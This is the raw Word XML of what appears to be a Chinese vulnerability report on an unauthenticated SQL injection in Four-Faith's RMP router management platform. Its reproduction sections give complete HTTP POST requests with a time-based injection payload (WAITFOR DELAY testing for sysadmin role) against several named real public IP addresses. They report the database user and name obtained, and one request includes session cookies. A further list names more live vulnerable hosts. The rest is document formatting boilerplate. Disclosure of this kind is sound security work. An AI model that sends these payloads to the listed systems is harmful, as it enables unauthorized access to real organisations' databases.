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rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk101714508"/>
      <w:bookmarkStart w:id="1" w:name="header-n2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkStart w:id="2" w:name="查看home\webapps\nc_web\WEB-INF_目录下的web.xm"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkStart w:id="3" w:name="9220-1618488987444"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkStart w:id="4" w:name="_ytu4jrp7bqn9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkStart w:id="5" w:name="8237-1617431691563"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkStart w:id="6" w:name="9136-1617446319483"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkStart w:id="7" w:name="_Toc465624914"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkStart w:id="8" w:name="_Hlk107925147"/>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkStart w:id="9" w:name="_Toc66104703"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkStart w:id="10" w:name="3060-1621846615933"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkStart w:id="11" w:name="_Toc465624987"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkStart w:id="12" w:name="2059-1618110988231"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkStart w:id="13" w:name="_Hlk88260929"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkStart w:id="14" w:name="6284-1637222936512"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkStart w:id="15" w:name="_Toc91416756"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkStart w:id="16" w:name="header-n0"/>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkStart w:id="17" w:name="_Hlk101716062"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="微软雅黑"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="_Hlk152775012"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkStart w:id="19" w:name="Ec9g-1702051291975"/>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkStart w:id="20" w:name="jnKZ-1664418402576"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkStart w:id="21" w:name="fXPO-1665411648650"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkStart w:id="22" w:name="_Hlk76027522"/>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkStart w:id="23" w:name="BazU-1689905584507"/>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkStart w:id="24" w:name="Tenda AC18 Unauthorized stack overflow v"/>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkStart w:id="25" w:name="udc698671"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkStart w:id="26" w:name="_Hlk150950876"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkStart w:id="27" w:name="y6b0-1665411709474"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkStart w:id="28" w:name="1C0R-1665411919332"/>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkStart w:id="29" w:name="无锡安腾软件开发有限公司凤凰卫士电子文档安全管理系统 存在弱口令"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkStart w:id="30" w:name="_Hlk147355853"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkStart w:id="31" w:name="_Hlk145142931"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t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bookmarkStart w:id="32" w:name="_Hlk152852087"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkStart w:id="33" w:name="3u9j-1701869103196"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkStart w:id="34" w:name="WNZo-1703148805073"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkStart w:id="35" w:name="ZErO-1703082504766"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkStart w:id="36" w:name="856Q-1701849238481"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkStart w:id="37" w:name="QMp2-1703148335883"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>厦门四信通信科技有限公司RMP路由器管理平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台存在前台SQL注入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公司资产证明：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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2199005"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1079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该公司官网：http://www.four-faith.com/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2804795"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1460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漏洞说明：</w:t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系统存在不需要登陆情况下的前台SQL注入</w:t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复现：</w:t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instrText xml:space="preserve"> HYPERLINK "http://118.190.134.103:8800/" </w:instrTex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separate"/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http://118.190.134.103:8800/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end"/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获取当前用户名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'sysadmin'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POST /Device/Device/GetDeviceInfoList?deviceCode=&amp;searchField=&amp;deviceState= HTTP/1.1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Host: 118.190.134.103:8800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Content-Length: 78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Accept: application/json, text/javascript, */*; q=0.01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X-Requested-With: XMLHttpRequest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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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Origin: http://118.190.134.103:8800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Referer: http://118.190.134.103:8800/General/Home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Accept-Encoding: gzip, deflate, br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Accept-Language: zh-CN,zh;q=0.9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Connection: close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groupId=1');if+(SELECT+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--</w:t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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5261610" cy="1922780"/>
            <wp:effectExtent l="0" t="0" r="15240" b="127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当前数据库名字为CA</w:t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</w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="789305"/>
            <wp:effectExtent l="0" t="0" r="3175" b="1079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复现：</w:t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instrText xml:space="preserve"> HYPERLINK "http://47.100.100.196:8800/" </w:instrTex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separate"/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http://47.100.100.196:8800/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end"/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获取当前用户名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'sysadmin'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POST /Device/Device/GetDeviceInfoList?deviceCode=&amp;searchField=&amp;deviceState= HTTP/1.1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Host: 47.100.100.196:8800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Content-Length: 78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Accept: application/json, text/javascript, */*; q=0.01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X-Requested-With: XMLHttpRequest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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Content-Type: application/x-www-form-urlencoded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Origin: http://47.100.100.196:8800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Referer: http://47.100.100.196:8800/Device/Home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Accept-Encoding: gzip, deflate, br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Accept-Language: zh-CN,zh;q=0.9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Connection: close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groupId=1');if+(SELECT+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2016125"/>
            <wp:effectExtent l="0" t="0" r="12700" b="317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复现：</w:t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instrText xml:space="preserve"> HYPERLINK "http://180.250.201.155:8800/" </w:instrTex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separate"/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http://180.250.201.155:8800/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end"/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获取当前用户名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'sysadmin'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POST /Device/Device/GetDeviceInfoList?deviceCode=&amp;searchField=&amp;deviceState=  HTTP/1.1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Host: 180.250.201.155:8800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Content-Length: 78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Accept: application/json, text/javascript, */*; q=0.01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X-Requested-With: XMLHttpRequest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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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Origin: http://180.250.201.155:8800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Referer: http://180.250.201.155:8800/General/Home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Accept-Encoding: gzip, deflate, br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Accept-Language: zh-CN,zh;q=0.9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Connection: close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groupId=1');if+(SELECT+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2016125"/>
            <wp:effectExtent l="0" t="0" r="6350" b="3175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复现：</w:t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instrText xml:space="preserve"> HYPERLINK "http://47.88.21.65:8800/" </w:instrTex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separate"/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http://47.88.21.65:8800/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end"/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获取当前用户名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'sysadmin'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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2011045"/>
            <wp:effectExtent l="0" t="0" r="10160" b="825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复现：</w:t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instrText xml:space="preserve"> HYPERLINK "http://125.77.202.162:20101/" </w:instrTex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separate"/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http://125.77.202.162:20101/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end"/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获取当前用户名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'sysadmin'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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2138680"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1397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复现：</w:t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instrText xml:space="preserve"> HYPERLINK "http://125.77.202.162:20116/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://125.77.202.162:20116/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end"/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获取当前用户名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>'sysadmin'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POST /Device/Device/GetDeviceInfoList?deviceCode=&amp;searchField=&amp;deviceState=  HTTP/1.1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Host: 125.77.202.162:20116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Content-Length: 78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Accept: text/plain, */*; q=0.01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X-Requested-With: XMLHttpRequest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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36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Content-Type: application/x-www-form-urlencoded; charset=UTF-8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Origin: http://125.77.202.162:20116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Referer: http://125.77.202.162:20116/Account/Login?returnUrl=http://125.77.202.162:20116/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Accept-Encoding: gzip, deflate, br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Accept-Language: zh-CN,zh;q=0.9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Cookie: 125.77.202.16220101UserName=0B9gvXvsUI8=; 125.77.202.16220101UserName_Guid=25a1da81d8f44e9fbf7f5b91746d0e82; ASP.NET_SessionId=sfbqdzp3ujw2ya3dasq1dash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Connection: close</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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</w:rPr>
        <w:t>groupId=1');if+(SELECT+IS_SRVROLEMEMBER('sysadmin'))=1+WAITFOR+DELAY+'0:0:5'--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="2035175"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3175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其他案例</w:t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instrText xml:space="preserve"> HYPERLINK "http://videos.four-faith.com:20101/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://videos.four-faith.com:20101/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end"/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instrText xml:space="preserve"> HYPERLINK "http://125.77.202.162:20101/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://125.77.202.162:20101/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end"/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instrText xml:space="preserve"> HYPERLINK "http://112.48.26.30:20101/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://112.48.26.30:20101/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end"/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instrText xml:space="preserve"> HYPERLINK "http://117.48.145.205:8510/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://117.48.145.205:8510/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end"/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instrText xml:space="preserve"> HYPERLINK "http://125.77.202.162:20116/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://125.77.202.162:20116/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end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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instrText xml:space="preserve"> HYPERLINK "http://59.45.61.162:8382/" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="42"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://59.45.61.162:8382/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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="17"/>
    <w:p>
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:rPr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hidden="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1151890</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>165735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5248275" cy="1290955"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="7" name="Rectangle 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129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o:spt="1" style="position:absolute;left:0pt;margin-left:90.7pt;margin-top:13.05pt;height:101.65pt;width:413.25pt;visibility:hidden;z-index:251659264;mso-width-relative:page;mso-height-relative:page;" fillcolor="#FFFFFF" filled="t" stroked="f" coordsize="21600,21600" o:gfxdata="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f91Yt2wAAAAsB&#10;AAAPAAAAAAAAAAEAIAAAACIAAABkcnMvZG93bnJldi54bWxQSwECFAAUAAAACACHTuJA1OOfahgC&#10;AABDBAAADgAAAAAAAAABACAAAAAqAQAAZHJzL2Uyb0RvYy54bWxQSwUGAAAAAAYABgBZAQAAtAUA&#10;AAAA&#10;">
                <v:fill on="t" focussize="0,0"/>
                <v:stroke on="f"/>
                <v:imagedata o:title=""/>
                <o:lock v:ext="edit" aspectratio="f"/>
                <v:textbox inset="1.016mm,1.016mm,1.016mm,1.016mm"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateConten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10" w:usb3="00000000" w:csb0="0000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">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="020B0604020202030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001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s New Roman (Body CS)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2000028" w:usb3="00000000" w:csb0="600001DF" w:csb1="FFDF0000"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:altName w:val="Courier New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ejaVu Sans Mono">
    <w:panose1 w:val="020B0609030804020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E60026FF" w:usb1="D200F9FB" w:usb2="02000028" w:usb3="00000000" w:csb0="600001DF" w:csb1="DFD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DFD70000"/>
  </w:font>
  <w:font w:name="方正黑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tabs>
        <w:tab w:val="clear" w:pos="9020"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia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D6CA57"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="ABD6CA57"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="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E2495D1A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E2495D1A"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="13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2">
    <w:nsid w:val="000728F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="000728F1"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="206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>
    <w:nsid w:val="054F49E1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="054F49E1"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="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 w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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 w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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 w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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 w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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 w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1"/>
      <w:pStyle w:val="269"/>
      <w:isLgl/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="图 %1.%7 "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlRestart w:val="1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>
    <w:nsid w:val="25C8E675"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25C8E675"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="226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225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Restart w:val="0"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="709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5">
    <w:nsid w:val="3EBB3C91"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EBB3C91"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="chineseCountingThousand"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="907"/>
        </w:tabs>
        <w:ind w:left="907" w:hanging="907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794"/>
        </w:tabs>
        <w:ind w:left="794" w:hanging="794"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia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907"/>
        </w:tabs>
        <w:ind w:left="907" w:hanging="907"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="188"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1021"/>
        </w:tabs>
        <w:ind w:left="1021" w:hanging="1021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247"/>
        </w:tabs>
        <w:ind w:left="1247" w:hanging="1247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531D386D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="531D386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pStyle w:val="207"/>
      <w:isLgl/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="727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94" w:hanging="108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61" w:hanging="144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28" w:hanging="180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195" w:hanging="216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202" w:hanging="216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69" w:hanging="252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936" w:hanging="2880"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="7">
    <w:nsid w:val="5D665890"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D665890"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="25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804DFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68804DFB"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="262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1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:p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080" w:hanging="360"/>
      </w:p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440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tentative="0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 w:tentative="0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0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removePersonalInformation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NhYzZhYjljMzQ3ZDY2YWJjZjJmM2RlNDZjMzhkZWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00172A27"/>
    <w:rsid w:val="00000717"/>
    <w:rsid w:val="0000134D"/>
    <w:rsid w:val="00001B43"/>
    <w:rsid w:val="0000290F"/>
    <w:rsid w:val="0000364F"/>
    <w:rsid w:val="00003697"/>
    <w:rsid w:val="00006BDD"/>
    <w:rsid w:val="00007868"/>
    <w:rsid w:val="00011DFF"/>
    <w:rsid w:val="00012492"/>
    <w:rsid w:val="000126D1"/>
    <w:rsid w:val="00012AD6"/>
    <w:rsid w:val="00013896"/>
    <w:rsid w:val="00013AEC"/>
    <w:rsid w:val="00013BC8"/>
    <w:rsid w:val="00014506"/>
    <w:rsid w:val="000151F4"/>
    <w:rsid w:val="00015F6A"/>
    <w:rsid w:val="000169D5"/>
    <w:rsid w:val="00017959"/>
    <w:rsid w:val="000206BF"/>
    <w:rsid w:val="00020F14"/>
    <w:rsid w:val="00024806"/>
    <w:rsid w:val="00025A6E"/>
    <w:rsid w:val="00026FCD"/>
    <w:rsid w:val="000316CF"/>
    <w:rsid w:val="000330BF"/>
    <w:rsid w:val="00033767"/>
    <w:rsid w:val="0003689B"/>
    <w:rsid w:val="00040E69"/>
    <w:rsid w:val="00042540"/>
    <w:rsid w:val="0004548E"/>
    <w:rsid w:val="00045E41"/>
    <w:rsid w:val="00047429"/>
    <w:rsid w:val="000511C9"/>
    <w:rsid w:val="00051A6B"/>
    <w:rsid w:val="00051D4C"/>
    <w:rsid w:val="000520FC"/>
    <w:rsid w:val="000524C1"/>
    <w:rsid w:val="00052810"/>
    <w:rsid w:val="00054E2D"/>
    <w:rsid w:val="00054F40"/>
    <w:rsid w:val="000555CB"/>
    <w:rsid w:val="000563C1"/>
    <w:rsid w:val="000570E3"/>
    <w:rsid w:val="00057BC5"/>
    <w:rsid w:val="000613E5"/>
    <w:rsid w:val="000616D4"/>
    <w:rsid w:val="00063238"/>
    <w:rsid w:val="00064147"/>
    <w:rsid w:val="00065D73"/>
    <w:rsid w:val="00065EEC"/>
    <w:rsid w:val="000675CE"/>
    <w:rsid w:val="00067694"/>
    <w:rsid w:val="00067AED"/>
    <w:rsid w:val="00067B0D"/>
    <w:rsid w:val="00071AE5"/>
    <w:rsid w:val="00072266"/>
    <w:rsid w:val="00074CCB"/>
    <w:rsid w:val="0007523A"/>
    <w:rsid w:val="00075AAB"/>
    <w:rsid w:val="00076BB3"/>
    <w:rsid w:val="00076CC1"/>
    <w:rsid w:val="00076F9D"/>
    <w:rsid w:val="00077FE8"/>
    <w:rsid w:val="00080E01"/>
    <w:rsid w:val="00081728"/>
    <w:rsid w:val="000817F7"/>
    <w:rsid w:val="0008305E"/>
    <w:rsid w:val="0008324F"/>
    <w:rsid w:val="00084A31"/>
    <w:rsid w:val="00085126"/>
    <w:rsid w:val="00085A64"/>
    <w:rsid w:val="00085DA3"/>
    <w:rsid w:val="00086D58"/>
    <w:rsid w:val="00086FE3"/>
    <w:rsid w:val="0009120F"/>
    <w:rsid w:val="000916E6"/>
    <w:rsid w:val="00091735"/>
    <w:rsid w:val="00091C76"/>
    <w:rsid w:val="00092B2E"/>
    <w:rsid w:val="00093093"/>
    <w:rsid w:val="000936AD"/>
    <w:rsid w:val="00094067"/>
    <w:rsid w:val="0009411E"/>
    <w:rsid w:val="00094664"/>
    <w:rsid w:val="00095934"/>
    <w:rsid w:val="00097053"/>
    <w:rsid w:val="000973C3"/>
    <w:rsid w:val="00097BB8"/>
